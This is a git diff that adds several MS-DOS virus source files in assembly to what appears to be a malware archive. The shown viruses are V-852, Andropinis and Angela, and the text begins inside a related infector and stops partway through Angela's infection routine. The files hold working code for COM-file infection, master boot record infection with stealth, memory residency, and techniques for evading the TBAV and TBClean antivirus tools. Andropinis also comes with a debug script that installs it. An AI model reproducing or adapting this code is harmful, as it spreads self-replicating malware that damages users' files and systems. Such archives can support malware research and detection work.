+ mov cx,virlen
+ rep movsb
+
+ mov dx,newdta ;Set new Disk Transfer Address
+ mov ah,1A ;Set DTA
+ int 21
+ mov dx,offset allcom ;Search for '*.COM' files
+ mov cx,110b ;Normal, Hidden or System
+ mov ah,4E ;Find First file
+ int 21
+ jc done ;Quit if none found
+
+mainlp:
+ mov dx,offset fname
+ mov ax,3D02 ;Open file in Read/Write mode
+ int 21
+ mov [handle],ax ;Save handle
+ mov bx,ax
+ push es
+ pop ds
+ mov dx,buffer
+ mov cx,0FFFF ;Read all bytes
+ mov ah,3F ;Read from handle
+ int 21 ;Bytes read in AX
+ add ax,buffer
+ mov cs:[eof],ax ;Save pointer to the end of file
+ db 3E ;Force DS: prefix
+ cmp [newid],'VI' ;Infected?
+ je close ;Go find next file
+
+ xor cx,cx ;Go to file beginning
+ mov dx,cx
+ mov bx,cs:[handle]
+ mov ax,4200 ;LSEEK from the beginning of the file
+ int 21
+ jc close ;Leave this file if error occures
+
+ mov dx,0 ;Write the whole code (virus+file)
+ mov cx,cs:[eof] ; back onto the file
+ mov bx,cs:[handle]
+ mov ah,40 ;Write to handle
+ int 21
+
+close:
+ mov bx,cs:[handle]
+ mov ah,3E ;Close the file
+ int 21
+
+ push cs
+ pop ds ;Restore DS
+ mov ah,4F ;Find next matching file
+ mov dx,newdta
+ int 21
+ jc done ;Exit if all found
+ jmp mainlp ;Otherwise loop again
+
+done:
+ mov dx,olddta ;Restore old Disk Transfer Address
+ mov ah,1A ;Set DTA
+ int 21
+
+ cmp [counter],5 ;If counter goes above 5,
+ jb progok ; the program becomes "sick"
+ mov ax,40
+ mov ds,ax ;Get the system timer value
+ mov ax,word ptr ds:[timer]
+ push cs
+ pop ds ;Restore DS
+ and ax,1 ;At random (if timer value is odd)
+ jz progok ; display the funny message
+ mov dx,offset message
+ mov ah,9 ;Print string
+ int 21
+ int 20 ;Terminate program
+
+message db 'Program sick error:Call doctor or '
+ db 'buy PIXEL for cure description',0A,0Dh,'$'
+
+progok:
+ mov si,offset transf ;Move this part of code
+ mov cx,smalcod ;Code length
+ xor di,di ;Move to ES:0
+ rep movsb ;Do it
+
+ xor di,di ;Clear DI
+ mov word ptr cs:[progbeg],0
+ mov word ptr cs:[progbeg+2],es ;Point progbeg at program start
+ jmp cs:[progbeg] ;Jump at program start
+
+transf:
+ push ds
+ pop es
+ mov si,buffer+100
+ cmp [counter],1
+ jne skip
+ sub si,200
+skip:
+ mov di,offset start
+ mov cx,0FFFF ;Restore original program's code
+ sub cx,si
+ rep movsb
+ mov word ptr cs:[start],offset start
+ mov word ptr cs:[start+2],ds
+ jmp dword ptr cs:[start] ;Jump to program start
+endcode label byte
+
+ int 20 ;Dummy program
+ int 20 ;???
+
+ dw 0 ;Unused
+
+code ends
+ end start
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.amst-852.asm b/MSDOS/Virus.MSDOS.Unknown.amst-852.asm
new file mode 100644
index 00000000..1f919a05
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.amst-852.asm
@@ -0,0 +1,155 @@
+ page ,132
+ name V852
+ title The V-852 virus, based on the V-847 virus
+ .radix 16
+code segment
+ assume cs:code,ds:code
+ org 100
+
+timer equ 6C
+olddta equ 80
+virlen equ offset endcode - offset start
+smalcod equ offset endcode - offset transf
+buffer equ offset endcode + 100
+newdta equ offset endcode + 10
+fname = newdta + 1E
+virlenx = offset endcode - offset start
+newid = offset ident + virlenx + 100
+
+start:
+ jmp virus
+
+ident dw 'SS'
+counter db 0
+allcom db '*.COM',0
+vleng dw 44F ;Unused
+progbeg dd 10000h
+eof dw ?
+handle dw ?
+
+virus:
+ mov ax,cs ;Move program code
+ add ax,1000 ; 64K bytes forward
+ mov es,ax
+ inc [counter]
+ mov si,offset start
+ xor di,di
+ mov cx,virlen
+ rep movsb
+
+ mov dx,newdta ;Set new Disk Transfer Address
+ mov ah,1A ;Set DTA
+ int 21
+ mov dx,offset allcom ;Search for '*.COM' files
+ mov cx,110b ;Normal, Hidden or System
+ mov ah,4E ;Find First file
+ int 21
+ jc done ;Quit if none found
+
+mainlp:
+ mov dx,offset fname
+ mov ax,3D02 ;Open file in Read/Write mode
+ int 21
+ mov [handle],ax ;Save handle
+ mov bx,ax
+ push es
+ pop ds
+ mov dx,buffer
+ mov cx,0FFFF ;Read all bytes
+ mov ah,3F ;Read from handle
+ int 21 ;Bytes read in AX
+ add ax,buffer
+ mov cs:[eof],ax ;Save pointer to the end of file
+ db 3E ;Force DS: prefix
+ cmp ds:[newid],'SS' ;Infected?
+ je close ;Go find next file
+
+ xor cx,cx ;Go to file beginning
+ mov dx,cx
+ mov bx,cs:[handle]
+ mov ax,4200 ;LSEEK from the beginning of the file
+ int 21
+ jc close ;Leave this file if error occures
+
+ mov dx,0 ;Write the whole code (virus+file)
+ mov cx,cs:[eof] ; back onto the file
+ mov bx,cs:[handle]
+ mov ah,40 ;Write to handle
+ int 21
+
+close:
+ mov bx,cs:[handle]
+ mov ah,3E ;Close the file
+ int 21
+
+ push cs
+ pop ds ;Restore DS
+ mov ah,4F ;Find next matching file
+ mov dx,newdta
+ int 21
+ jc done ;Exit if all found
+ jmp mainlp ;Otherwise loop again
+
+done:
+ mov dx,olddta ;Restore old Disk Transfer Address
+ mov ah,1A ;Set DTA
+ int 21
+
+ cmp [counter],5 ;If counter goes above 5,
+ jb progok ; the program becomes "sick"
+ mov ax,40
+ mov ds,ax ;Get the system timer value
+ mov ax,word ptr ds:[timer]
+ push cs
+ pop ds ;Restore DS
+ and ax,1 ;At random (if timer value is odd)
+ jz progok ; display the funny message
+ mov dx,offset message
+ mov ah,9 ;Print string
+ int 21
+ int 20 ;Terminate program
+
+message db 0A, 0Dh, 7
+ db ' ! '
+ db ' !'
+ db 0A, 0Dh,'$'
+
+progok:
+ mov si,offset transf ;Move this part of code
+ mov cx,smalcod ;Code length
+ xor di,di ;Move to ES:0
+ rep movsb ;Do it
+
+ xor di,di ;Clear DI
+ mov word ptr cs:[progbeg],0
+ mov word ptr cs:[progbeg+2],es ;Point progbeg at program start
+ jmp cs:[progbeg] ;Jump at program start
+
+transf:
+ push ds
+ pop es
+ mov si,buffer+100
+ cmp [counter],1
+ jne skip
+ sub si,200
+skip:
+ mov di,offset start
+ mov cx,0FFFF ;Restore original program's code
+ sub cx,si
+ rep movsb
+ mov word ptr cs:[start],offset start
+ mov word ptr cs:[start+2],ds
+ jmp dword ptr cs:[start] ;Jump to program start
+endcode label byte
+
+ jmp short quit ; The original program
+
+ db 2 dup (90) ; Filler
+
+quit:
+ mov ax,4C00 ; Just exit with ErrorLevel 0
+ int 21
+
+code ends
+ end start
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.andropin.asm b/MSDOS/Virus.MSDOS.Unknown.andropin.asm
new file mode 100644
index 00000000..19b1b228
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.andropin.asm
@@ -0,0 +1,408 @@ +;****************************************************************************** +; +; Virus name : Andropinis +; Author : Rajaat +; Origin : United Kingdom, March 1995 +; Compiling : Using TASM | Using A86 +; | +; TASM /M2 ANDROPIN.ASM | A86 ANDROPIN.ASM +; TLINK ANDROPIN | +; EXE2BIN ANDROPIN | +; Installing : Place the produced BIN file at cylinder 0, head 0, sector 2 +; Modify the partition record to point to this code +; (a debug script is provided at the end of this source) +; Targets : Master Boot Record & COM files +; Size : 512 bytes +; Polymorphic : No +; Encrypted : No +; Stealth : Full Stealth on Master Boot Record +; Tunneling : No - is not needed if started from Master boot record +; Retrovirus : No +; Antiheuristics: Yes - for TBAV +; Peculiarities : Infects MBR by modifying 2 bytes +; Uses SFT's to infect COM files +; Avoids Thunderbyte Antivirus using a 2 byte signature! +; Behaviour : When an infected COM file is run, the virus will not become +; resident, but will first infect the master boot record. It +; does its work in a very peculiar way. It modifies the +; 1st partition record with the result that it points to +; cylinder 0, head 0, sector 2. The viral bootsector will be +; stored there. The next time when a system is booted, +; Andropinis will become resident in high memory, but below +; the top of memory. Programs like CHKDSK.EXE will show a +; decrease in system memory of 1024 bytes. The virus will hook +; interrupt 13 at this time and wait till interrupt 21 is +; captured 3 times. Andropinis will then take interrupt 21 +; itself. The virus is now stealth on the master boot record, +; only modifying the pointer to the bootsector in memory when +; the master boot record is read. The virus will infect COM +; files when copied, therefore not needing a critical interrupt +; handler. Andropinis will only infect COM files when they are +; between 4095 and 61441 bytes. 
Infected files will begin with +; a PUSH AX, DEC BX, NOP and a near jump to the virus code. +; The first 2 instructions will cause the Thunderbyte scanner +; to avoid the file. It thinks it's processed with PkLite! f +; Even the "ex"tract option doesn't work and gives back a "N/A" +; for every infected file. F-PROT detects nothing, except when +; the /ANALYSE option is used. AVP gives a virus "Type Boot" +; suspicion. How true that is. The weak point of the virus is +; its lack of protection in infected COM files, so it relies on +; the fact that the Master Boot Record infection isn't visible. +; Tai-Pan spread also far, and was even more simplistic than +; Andropinis, with the exception that is infected the more +; common filetype, the EXE file. The virus doesn't do any +; intended harm, as Patty would say : +; "It's unknown what this virus does besides replicate." +; Yoho's : VLAD, Immortal Riot, Phalcon/Skism, [NuKE], +; and all other virus writers that exist. +; +;****************************************************************************** + +.model tiny ; this must become a BIN file + +.code ; let's start with the code, ok + +.radix 16 ; safe hex + + org 0 ; throw it in the bin + +;****************************************************************************** +; Viral boot sector +;****************************************************************************** + +virus: xor bx,bx ; initialise stack and data + cli ; segment + mov ss,bx ; + mov ds,bx ; + mov sp,7c00 ; + push sp ; + sti ; + + mov si,413 ; steal some memory from the + dec word ptr [si] ; top + lodsw ; + + mov cl,6 ; calculate free segment for + shl ax,cl ; virus + mov es,ax ; + + pop si + mov di,bx ; push data for a far jump to + push di ; the virus code in high memory + push es ; + lea ax,init_resident ; + push ax ; + + mov cx,100 ; move the code to high memory +move_boot: movsw ; this doesn't trigger tbav + loop move_boot ; + + retf ; return to the address pushed + 
+;****************************************************************************** +; the following piece of code is executed in high memory +;****************************************************************************** + +init_resident: mov byte ptr cs:hook_21_flag,0 ; reset int 21 hook flag + + lea di,old_13 ; store old int 13 vector and + mov si,4*13 ; replace it with our new + lea ax,new_13 ; handler + xchg ax,[si] ; + stosw ; + mov ax,cs ; + xchg ax,[si+2] ; + stosw ; + + mov si,4*21 ; store new address to int 21 + lea ax,new_21 ; vector + xchg ax,[si] ; + mov ax,cs ; + xchg ax,[si+2] ; + + pop es ; read the original bootsector + push es ; and execute it + mov ax,0201 ; + mov dx,180 ; + mov cx,1 ; + mov bx,7c00 ; + push bx ; + int 13h ; + retf ; + +;****************************************************************************** +; new int 13 handler +;****************************************************************************** + +new_13: cmp ax,5001 ; installation check + jne no_inst_check ; + xchg ah,al ; + iret + +no_inst_check: cmp ah,2 ; check if partition sector + jne no_stealth ; is read. if not, there's + cmp dx,80 ; no need to use stealth + jne no_stealth ; + cmp cx,1 ; + jne no_stealth ; + + pushf ; perform read action, and + call dword ptr cs:[old_13] ; go to stealth_mbr if no error + jnc stealth_mbr ; occured + retf 2 ; + +stealth_mbr: cmp word ptr es:1bf[bx],200 ; is the virus active? + jne not_infected ; no, goto not_infected + mov word ptr es:1bf[bx],0101 ; stealth virus +not_infected: iret ; + +no_stealth: cmp byte ptr cs:[hook_21_flag],3; if this is try 3 to get int + je eoi_13 ; 21, get lost to eoi_13 + + push ax ; preserve these + push ds ; + + xor ax,ax ; is int 21 changed? 
+ mov ds,ax ; + mov ax,cs ; + cmp ax,word ptr ds:[4*21+2] ; + je int_21_ok ; no, int 21 is ok + + inc byte ptr cs:[hook_21_flag] ; increase the hook int 21 flag + + lea ax,new_21 ; capture int 21 and store + xchg ax,ds:[4*21] ; the old vector + mov word ptr cs:old_21,ax ; + mov ax,cs ; + xchg ax,ds:[4*21+2] ; + mov word ptr cs:old_21[2],ax ; + +int_21_ok: pop ds ; get these back + pop ax ; + +eoi_13: jmp dword ptr cs:[old_13] ; chain to old int 13 + +;****************************************************************************** +; new int 21 handler +;****************************************************************************** + +new_21: cmp ah,40 ; is a write command performed? + je write_to_file ; yeah, write_to_file + +eoi_21: jmp dword ptr cs:[old_21] ; chain to old int 21 + +write_to_file: push ax ; preserve some registers + push bx ; + push dx ; + push di ; + push es ; + + mov ax,4400 ; check if the write belongs + int 21 ; to a device + test dl,80 ; + jnz not_suitable ; + + mov ax,1220 ; find file handle table that + int 2f ; belongs to the handle in bx + mov bl,byte ptr es:[di] ; + mov ax,1216 ; + int 2f ; + + mov bx,2020 ; check if the file has a com + mov ax,word ptr es:[di+28] ; extension + or ax,bx ; + cmp ax,'oc' ; + jne not_suitable ; + mov al,byte ptr es:[di+2a] ; + or al,bl ; + cmp al,'m' ; + jne not_suitable ; + + cmp word ptr es:[di+11],0 ; check if file length is + jne not_suitable ; zero + + cmp cx,1000 ; check if piece of code is + jb not_suitable ; not too short or too long + cmp cx,0f000 ; + ja not_suitable ; + + pop es ; these registers are done + pop di ; + pop dx ; + + mov bx,dx ; check if the file is a + cmp word ptr ds:[bx],'ZM' ; renamed exe file + je is_renamed_exe ; + + cmp word ptr ds:[bx+2],0e990 ; check if already infected + jne infect_com ; + jmp is_renamed_exe + +not_suitable: pop es ; done with this interrupt + pop di ; service routine, so chain + pop dx ; to the old 21 routine +is_renamed_exe: pop bx ; + pop ax ; + jmp 
eoi_21 ; + +;****************************************************************************** +; piece of code that infects a COM file +;****************************************************************************** + +infect_com: pop bx ; this register was done + + push cx ; get the first 6 bytes of the + push si ; host and overwrite them with + add cx,offset com_entry-6 ; the new bytes. it places a + mov si,dx ; nifty piece of code to + mov ax,'KP' ; render tbscans heuristics + xchg word ptr [si],ax ; useless. the PUSH AX, DEC BX + mov word ptr cs:org_com,ax ; (PK) in the begin of the + lodsw ; program makes tbscan think + mov ax,0e990 ; it is a PkLite compressed + xchg word ptr ds:[si],ax ; file and will skip it! + mov word ptr cs:org_com+2,ax ; + lodsw ; + xchg word ptr ds:[si],cx ; + mov word ptr cs:org_com+4,cx ; + pop si ; + pop cx ; + + pop ax ; perform original write + pushf ; command + call dword ptr cs:[old_21] ; + + push ax ; and append the virus at the + push cx ; end of the file + push dx ; + push ds ; + push cs ; + pop ds ; + mov ah,40 ; + mov cx,virus_length_b ; + lea dx,virus ; + pushf ; + call dword ptr cs:[old_21] ; + pop ds ; + pop dx ; + pop cx ; + pop ax ; + retf 2 ; + +;****************************************************************************** +; this gets executed by an infected COM file +;****************************************************************************** + +com_entry: call get_offset ; old hat for getting the +get_offset: pop bp ; delta offset + sub bp,offset get_offset ; + + mov ax,5001 ; if the virus is resident it + int 13 ; doesn't need to infect the + cmp ax,0150 ; master boot record + je is_active ; + + mov ax,0201 ; read master boot record. 
+ lea bx,heap[bp] ; if an error occured, goto + mov cx,1 ; is_active + mov dx,80 ; + int 13 ; + jc is_active ; + + cmp word ptr [bx+1be+1],0101 ; test if the partition begins + jne is_active ; at the normal sector + + test byte ptr [bx+1be],80 ; test of the partition is + jz is_active ; bootable + + mov al,byte ptr [bx+1be+4] ; test if the partition type + cmp al,4 ; is ok + jb is_active ; + cmp al,6 ; + ja is_active ; + + mov word ptr [bx+1be+1],200 ; change pointer to virus code + + mov ax,0301 ; write back the master boot + push ax ; record. quit if error + int 13 ; occured + pop ax ; + jc is_active ; + + inc cx ; write virus to sector 2 + lea bx,virus[bp] ; (right behind the mbr) + int 13 ; + +is_active: lea si,org_com[bp] ; restore beginning of the + mov di,100 ; host and execute it + pop ax ; + push cs ; + push di ; + movsw ; + movsw ; + movsw ; + retf ; + +;****************************************************************************** +; some data used by the virus +;****************************************************************************** + + db '[Andropinis]' ; my childs name + db ' by Rajaat',0 ; my name + + org 1fe ; for the bootsector + + db 55,0aa ; boot signature + +;****************************************************************************** +; the things below aren't copied into the viral boot sector, only in COM files +;****************************************************************************** + +org_com equ $ ; original program data + +heap equ $+6 ; memory for data + +virus_length_b equ heap-virus ; who says size doesn't count? 
+virus_length_s equ (virus_length_b+1ff) / 200 ; +virus_length_k equ (virus_length_b+3ff) / 400 ; + +old_13 equ heap+6 ; old int 13 vector +old_21 equ heap+0a ; old int 21 vector +hook_21_flag equ heap+0e ; int 21 hook flag + +end virus ; the end complete +end ; +;****************************************************************************** + +; remove the piece below if you use A86 instead of TASM, because it will +; choke on it + + --- debug script for installing the Andropinis virus --- + +install with +DEBUG ANDROPIN.BIN < scriptname +where scriptname is the name that you give to the mess below + + --- cut here --- +m 100 l200 1000 +a +mov ax,0201 +mov bx,800 +mov cx,1 +mov dx,80 +int 13 +mov si,9bf +mov word ptr [si],200 +mov ax,0301 +mov dx,80 +int 13 +mov ax,0301 +mov bx,1000 +inc cx +int 13 +int 20 + +g +q + --- cut here --- + diff --git a/MSDOS/Virus.MSDOS.Unknown.angela.asm b/MSDOS/Virus.MSDOS.Unknown.angela.asm new file mode 100644 index 00000000..a88a571f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.angela.asm 
@@ -0,0 +1,841 @@ +;=============================================================================== +; +; (c) 1993 by NuKE Computer Security Publications, Inc. +; Developed by Rock Steady of NuKE Inc. +; +; +; +virus_size equ last - init_virus ;virus size (bytes) + +seg_a segment byte public + assume cs:seg_a,ds:seg_a + + org 100h ;compile to .com + +start: jmp init_virus + +;------------------------------------------------------------------------------- +init_virus: call doit_now ;begin virus + +doit_now: pop bp ;pop call offset + sub bp,offset doit_now ;fix it with pointer + + push ax + push bx ;save the registers + push cx + push dx + push si + push ds + + + mov byte ptr cs:[tb_here][bp],00h + xor dx,dx ;dx=0 + mov ds,dx ;ds=0 + mov ax,word ptr ds:[0006h] ;ax=0000:0006 segment of + ; int 1h + mov ds,ax ;ds=segment of int 1 + mov cx,0FFFFh ;cx=64k + mov si,dx ;si=0 + +look_4_tbclean: cmp word ptr ds:[si],0A5F3h ;look TBClean in memory + je check_it ;jmp if its TBClean +look_again: inc si ;if not continue looking + loop look_4_tbclean + jmp not_found ;not found cont normal + +check_it: cmp word ptr ds:[si+2],0C7FAh ;check TBClean string + jne look_again ;jmp =! tbclean + cmp word ptr ds:[si+4],0006h ;check TBClean string + jne look_again ;jmp =! tbclean + cmp word ptr ds:[si+10],020Eh ;check TBClean string + jne look_again ;jmp =! tbclean + cmp word ptr ds:[si+12],0C700h ;check TBClean string + jne look_again ;jmp =! tbclean + cmp word ptr ds:[si+14],0406h ;check TBClean string + jne look_again ;jmp =! 
tbclean + + mov bx,word ptr ds:[si+17] ;steal REAL int 1 offset + mov byte ptr ds:[bx],0CFh ;replace with IRET + + mov bx,word ptr ds:[si+27] ;steal REAL int 3 offset + mov byte ptr ds:[bx],0CFh ;replece with IRET + + mov byte ptr cs:[tb_here][bp],01h ;set the TB flag on + + mov bx,word ptr ds:[si+51h] ;get 2nd segment of ints + mov word ptr cs:[tb_int2][bp],bx ;vector table + + mov bx,word ptr ds:[si-5] ;get offset of 1st copy + mov word ptr cs:[tb_ints][bp],bx ;of vector table + +not_found: xor dx,dx + push ds + mov ds,dx ;put that in ds + les si,dword ptr ds:[0084h] ;get int21 vector + mov word ptr cs:[int21][bp],si ;save int21 offset + mov word ptr cs:[int21+2][bp],es ;save int21 segment + + les si,dword ptr ds:[0070h] ;get int1c vector + mov word ptr cs:[int1c][bp],si ;save int1c offset + mov word ptr cs:[int1c+2][bp],es ;save int1c segment + + les si,dword ptr ds:[004ch] ;get int13 vector + mov word ptr cs:[int13][bp],si ;save int13 offset + mov word ptr cs:[int13+2][bp],es ;save int13 segment + pop ds + + mov byte ptr cs:[mcb][bp],00h ;reset the TB mcb flag + mov ax,0abcdh ;test if virus is here? + int 13h + cmp bx,0abcdh ;is it? + jne install_virus ;jmp, if not & install +leave_mcb: jmp exit_mem ;yes, leave then + +;--------- Going Resident ------ + +steal_some: mov al,byte ptr cs:[mcb][bp] ;if tb is here, steal + cmp al,0ffh ;memory from it! + je leave_mcb ;error? exit then + inc byte ptr cs:[mcb][bp] ;inc flag + cmp al,01 ; + ja mcb3_1 + +install_virus: mov ah,52h ;get the list of lists + int 21h ;use dos + mov ax,es:[bx-2] ;get first mcb chain + + mov es,ax ;es=segment of 1st mcb +mcb1: cmp byte ptr es:[0000h],'Z' ;is it the last mcb + jne mcb2 ;jmp if not + clc ;yes last mcb, CLC + jmp short mcbx ;outta here + +mcb2: cmp byte ptr es:[0000h],'M' ;is it in the chain + je mcb3 ;jmp if yes + stc ;error, set carry flag + jmp short mcbx ;outta here + +mcb3: cmp byte ptr cs:[mcb][bp],0 ;is TB flag off? 
+ je mcb3_1 ;if yes, then jmp + mov dx,ds ;else cmp TB ds + sub dx,10h ;ds-10 + cmp word ptr es:[0001h],dx ;cmp to mcb owner. + je mcbx_1 + +mcb3_1: mov ax,es ;ax=es + add ax,word ptr es:[0003h] ;ax=es + next mcb + inc ax ;get mcb + mov es,ax ;es=ax:next mcb chain + jmp short mcb1 ;goto first step + +mcbx: jc leave_mcb ;if error, exit +mcbx_1: cmp word ptr es:[0003],(virus_size/16) + 11h + jb steal_some + mov byte ptr es:[0000],'Z' ;the last mcb chain! + sub word ptr es:[0003],(virus_size/16) + 11h + add ax,word ptr es:[0003h] ;figure out segment + inc ax ;add 16 bytes + mov es,ax ;new segment in es + mov di,103h ;offset is 103h + push ds ;save TB ds location + push cs + pop ds ;virus cs=ds + mov si,offset init_virus ;si=top of virus + add si,bp ;add delta + mov cx,virus_size ;move virus_size + cld ;clear direction flag + repne movsb ;do it Mr. Crunge + + mov ds,cx ;ds=0000 +hook_again: cli ;disable ints + mov word ptr ds:[0084h],offset int21_handler ;hook int21 + mov word ptr ds:[0086h],es + mov word ptr ds:[0070h],offset int1c_handler ;hook int1c + mov word ptr ds:[0072h],es + mov word ptr ds:[004ch],offset int13_handler ;hook int13 + mov word ptr ds:[004eh],es + sti ;enable ints + + cmp byte ptr cs:[tb_here][bp],00h ;was TB found? + je go_on ;no, then jmp + cmp cl,01h ;is this the 2nd x here? + je go_on ;yes, then jmp + mov ds,word ptr cs:[tb_int2][bp] ;get TB int segment + inc cl ;inc cl + jmp short hook_again ;hook ints again + +go_on: pop ds ;get TB code segment + cmp byte ptr cs:[tb_here][bp],01h ;TB here? + je hook_tb_ints ;yes, then jmp + jmp exit_mem ;else exit +hook_tb_ints: mov si,word ptr cs:[tb_ints][bp] ;get TB int offset + mov word ptr ds:[si+84h],offset int21_handler + mov word ptr ds:[si+86h],es + mov word ptr ds:[si+70h],offset int1c_handler + mov word ptr ds:[si+72h],es + mov word ptr ds:[si+4ch],offset int13_handler + mov word ptr ds:[si+4eh],es + +exit_mem: cmp word ptr cs:[buffer][bp],5A4Dh ;.exe file? 
+ je exit_exe_file ;yupe exit exe file + cmp word ptr cs:[buffer][bp],4D5Ah ;.exe file? + je exit_exe_file ;yupe exit exe file + push cs ;fix cs=ds for .com + pop ds + mov bx,offset buffer ;get first 3 bytes + add bx,bp ;fix delta + mov ax,[bx] ;move first 2 bytes + mov word ptr ds:[100h],ax ;put em in the beginning + inc bx ;inc pointer + inc bx + mov al,[bx] ;get last of 3rd byte + mov byte ptr ds:[102h],al ;put that in place + pop ds + pop si + pop dx + pop cx + pop bx + pop word ptr cs:[ax_reg][bp] ;save ax else where + mov ax,100h + push ax ;fake a CALL & RETN + mov ax,word ptr cs:[ax_reg][bp] ;put ax as normal + retn ;link to 100h + +exit_exe_file: mov dx,ds ;get psp=ds seg + add dx,10h ;add 16bytes to seg + pop ds + pop si + pop word ptr cs:[ax_reg][bp] + pop cx + pop bx + pop ax + add word ptr cs:[buffer+22][bp],dx ;fix segments + add dx,word ptr cs:[buffer+14][bp] + cli + mov ss,dx ;restore ss + mov sp,word ptr cs:[buffer+16][bp] ;and sp + sti + mov dx,word ptr cs:[ax_reg][bp] + jmp dword ptr cs:[buffer+20][bp] ;jmp to entry pt. 
+ +mcb db 0 +ax_reg dd 0 +int13 dd 0 +int1c dd 0 +int21 dd 0 +tb_ints dd 0 +tb_here db 0 +tb_int2 dd 0 + +;=============================================================================== +; Int 13h Handler +;=============================================================================== +int13_handler: + cmp ax,0abcdh ;virus test + je int13_test ;yupe + +int13call: jmp dword ptr cs:[int13] ;original int13 + +int13_test: mov bx,ax ;fix + iret +;=============================================================================== +; Int 1Ch Handler +;=============================================================================== +int1c_handler: + iret +;------------------------------------------------------------------------------- +; FCB Dir Stealth Routine (File Find) +;------------------------------------------------------------------------------- +fcb_dir: call calldos21 ;get the fcb block + test al,al ;test for error + jnz fcb_out ;jmp if error + push ax ;save registers + push bx + push cx + push es + mov ah,51h ;get current psp + call calldos21 ;call int21 + + mov es,bx ;es=segment of psp + cmp bx,es:[16h] ;psp of command.com? + jnz fcb_out1 ;no, then jmp + mov bx,dx ;ds:bx=fcb + mov al,[bx] ;1st byte of fcb + push ax ;save it + mov ah,2fh ;get dta + call calldos21 ;es:bx <- dta + + pop ax ;get first byte + inc al ;al=ffh therefor al=ZR + jnz fcb_old ;if != ZR jmp + add bx,7h ;extended fcb here, +7 +fcb_old: mov ax,es:[bx+17h] ;get file time stamp + mov cx,es:[bx+19h] ;get file date stamp + and ax,1fh ;unmask seconds field + and cx,1fh ;unmask day of month + xor ax,cx ;are they equal? 
+ jnz fcb_out1 ;nope, exit then + sub word ptr es:[bx+1dh],virus_size ;sub away virus_size + sbb word ptr es:[bx+1fh],0 ;sub with carry flag + +fcb_out1: pop es ;restore registers + pop cx + pop bx + pop ax +fcb_out: iret ;return control +;------------------------------------------------------------------------------- +; ASCIIZ Dir Stealth Routine (File Find) +;------------------------------------------------------------------------------- +dta_dir: call calldos21 ;get results to dta + jb dta_out ;if error, split + push ax ;save register + push bx + push cx + push es + mov ah,2fh ;get current dta + call calldos21 ;es:bx <- dta + + mov ax,es:[bx+16h] ;get file time stamp + mov cx,es:[bx+18h] ;get file date stamp + and ax,1fh ;unmask seconds field + and cx,1fh ;unmask day of month + xor ax,cx ;are they equal + jnz dta_out1 ;nope, exit then + sub word ptr es:[bx+1ah],virus_size ;sub away virus_size + sbb word ptr es:[bx+1ch],0 ;sub with carry flag + +dta_out1: pop es ;restore registers + pop cx + pop bx + pop ax +dta_out: retf 0002h ;pop 2 words of stack +;=============================================================================== +; Int 21h Handler +;=============================================================================== +int21_handler: +; cmp ah,11h ;FCB find first match +; je old_dir +; cmp ah,12h ;FCB find next match +; je old_dir + cmp ah,4eh ;Find first match + je new_dir + cmp ah,4fh ;Find next match + je new_dir + cmp ah,3dh ;Opening a file + je file_open + cmp ah,6ch ;Ext_opening a file + je file_ext_open + cmp ah,3eh ;closing a file + je file_close + cmp ah,4bh ;Execution of a file + je file_execute + +int21call: jmp dword ptr cs:[int21] ;original int21 + +old_dir: jmp fcb_dir ;fcb file find + +new_dir: jmp dta_dir ;new asciiz file find + +file_open: jmp open_file ;disinfect opening file + +file_ext_open: jmp open_ext_file ;disinfect opening file + +file_close: jmp close_file ;infect closing file + +file_execute: call check_extension ;check for 
ok ext + cmp byte ptr cs:[com_ext],1 ;is it a com? + je exec_disinfect ;yupe disinfect it + cmp byte ptr cs:[exe_ext],1 ;is it a exe? + je exec_disinfect ;yupe disinfect it + jmp SHORT int21call + +exec_disinfect: call exec_disinfect1 ;Disinfect file + + mov word ptr cs:[ax_reg],dx + pushf ;fake an int + call dword ptr cs:[int21] ;call dos + xchg word ptr cs:[ax_reg],dx ;restore dx + + mov byte ptr cs:[close],0 ;reset flag.. + push ax ;store 'em + push bx + push cx + push dx + push si + push di + push es + push ds +closing_infect: mov ax,3524h ;get error handler + call calldos21 ;call dos + + push es ;save es:bx= int_24 + push bx ;error handler + push ds ;ds:dx= asciiz string + push dx + push cs ;cs=ds + pop ds + mov dx,offset int21_handler ;hook error handler + mov ax,2524h ;with our int24h + call calldos21 + pop dx ;restore ds:dx asciiz + pop ds ;string + + cmp byte ptr cs:[close],0 ;Are we closing file? + je exec_get_att ;nope, then jmp + mov ax,word ptr cs:[handle] ;yupe, ax=file handle + jmp exec_open_ok ;jmp so you don't open + ;the file twice... +exec_get_att: mov ax,4300h ;get file attribs + call calldos21 ;call dos + jnc exec_attrib ;no, error jmp + jmp exec_exit2 ;ERROR - split + +exec_attrib: mov byte ptr cs:[attrib],cl + test cl,1 ;check bit 0 (read_only) + jz exec_attrib_ok ;if bit0=0 jmp + dec cx ;else turn of bit_0 + mov ax,4301h ;write new attribs + call calldos21 ;call dos + +exec_attrib_ok: mov ax,3d02h ;open file for r/w + call calldos21 ;call dos + jnc exec_open_ok ;ok, no error jmp + jmp exec_exit2 ;ERROR - split + +exec_open_ok: xchg bx,ax ;bx=file handler + push cs ;cs=ds + pop ds + mov ax,5700h ;get file time/date + call calldos21 ;call dos + + mov word ptr cs:[old_time],cx ;save file time + mov word ptr cs:[org_time],cx + mov word ptr cs:[old_date],dx ;save file date + and cx,1fh ;unmask second field + and dx,1fh ;unmask date field + xor cx,dx ;are they equal? 
